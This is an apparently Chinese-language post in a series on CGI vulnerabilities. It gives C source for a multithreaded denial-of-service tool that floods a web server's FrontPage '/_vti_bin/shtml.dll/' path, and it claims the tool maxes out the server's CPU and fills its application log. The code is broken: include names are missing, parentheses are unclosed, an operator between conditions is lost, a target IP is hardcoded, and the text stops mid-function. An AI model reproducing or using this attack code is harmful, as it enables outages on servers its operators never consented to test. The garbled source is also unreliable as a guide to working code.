|
CGI漏洞(15) 以下这个程序,能使目标服务器的CPU占用率达到 100%,并且耗用所有的应用程序日志空间。系统在数分
钟内会报告应用程序日志已满: #include
#include
#include
#include
#include void Dos(void *chara); void main(int argc,char *argv[])
{
WORD wVersionRequested;
WSADATA wsaData;
int err;
long lDo ;
if (argc < 2)
{
printf("Usage: %s IP\n",argv[0]);
exit(1);
return ;
} wVersionRequested = MAKEWORD( 2, 2 ); err = WSAStartup( wVersionRequested, &wsaData );
if ( err != 0 )
{
return;
} if ( LOBYTE( wsaData.wVersion ) != 2 HIBYTE( wsaData.wVersion ) != 2 )
{
WSACleanup( );
return;
}
printf("wait ...\n";
for (lDo = 0 ;lDo < 1000;lDo++)
{
//printf("1\n";
_beginthread(Dos, 0, (void*)argv[1]);
}
Sleep( 1000000L );
} void Dos(void *chara)
{
long lLen;
long lDo ;
char *ip ;
char buffer[2000];
struct sockaddr_in serv_addr;
SOCKET sockfd ;
char plusvuln[]="GET /_vti_bin/shtml.dll/";
ip= (char*)chara;
memset(buffer,‘\0‘,2000); serv_addr.sin_family =AF_INET;
serv_addr.sin_addr.s_addr = inet_addr("192.168.0.131";
serv_addr.sin_port = htons(80); if ((sockfd =socket(AF_INET,SOCK_STREAM,0))<0)
{
printf("Create Socket faild \n";
return ;
} if (connect(sockfd,(struct sockaddr*)&serv_addr,sizeof(serv_addr))<0)
| 
